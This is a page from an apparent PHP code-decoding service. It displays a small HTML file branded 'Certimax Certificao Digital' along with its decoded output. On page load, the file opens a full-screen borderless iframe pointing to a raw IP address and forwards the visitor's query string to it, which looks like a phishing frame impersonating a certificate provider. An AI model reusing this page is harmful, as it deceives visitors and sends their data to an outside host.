Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<html lang="pt-BR"> <HEAD> <TITLE>Certimax Certificao Digital</TITLE> <style type="..

Decoded Output download

<?  <html lang="pt-BR"> 
<HEAD>   
<TITLE>Certimax Certificao Digital</TITLE>  
<style  type="text/css"> 
body { margin:0; } 
</style> 
 
<script language="JavaScript" type="text/javascript"> 
 
function makeFrame() { 
   var parametros, par; 
  parametros = location.search; 
  parametros;  
   
  ifrm = document.createElement("IFRAME"); 
   ifrm.setAttribute("src", "http://177.39.156.199:8089/" + parametros); 
   ifrm.style.width = "100%"; 
   ifrm.style.height = "100%"; 
  ifrm.style.frameborder="0" 
   ifrm.style.align="center" 
   ifrm.style.marginheight="0"  
   ifrm.style.marginwidth="0" 
   document.body.appendChild(ifrm);    
  
} 
 
</script> 
</HEAD>   
 
<BODY LANG="en-US" DIR="LTR" onLoad="makeFrame();"  
      style="overflow-y: hidden;overflow-x: hidden;">   
</BODY>  
</HTML> ?>

Did this file decode correctly?

Original Code

<html lang="pt-BR">
<HEAD>  
<TITLE>Certimax Certificao Digital</TITLE> 
<style  type="text/css">
body { margin:0; }
</style>

<script language="JavaScript" type="text/javascript">

function makeFrame() {
   var parametros, par;
  parametros = location.search;
  parametros; 
  
  ifrm = document.createElement("IFRAME");
   ifrm.setAttribute("src", "http://177.39.156.199:8089/" + parametros);
   ifrm.style.width = "100%";
   ifrm.style.height = "100%";
  ifrm.style.frameborder="0"
   ifrm.style.align="center"
   ifrm.style.marginheight="0" 
   ifrm.style.marginwidth="0"
   document.body.appendChild(ifrm);   
 
}

</script>
</HEAD>  

<BODY LANG="en-US" DIR="LTR" onLoad="makeFrame();" 
      style="overflow-y: hidden;overflow-x: hidden;">  
</BODY> 
</HTML>

Function Calls

None

Variables

None

Stats

MD5 3a2f00727868dba12eb1b444950268f7
Eval Count 0
Decode Time 75 ms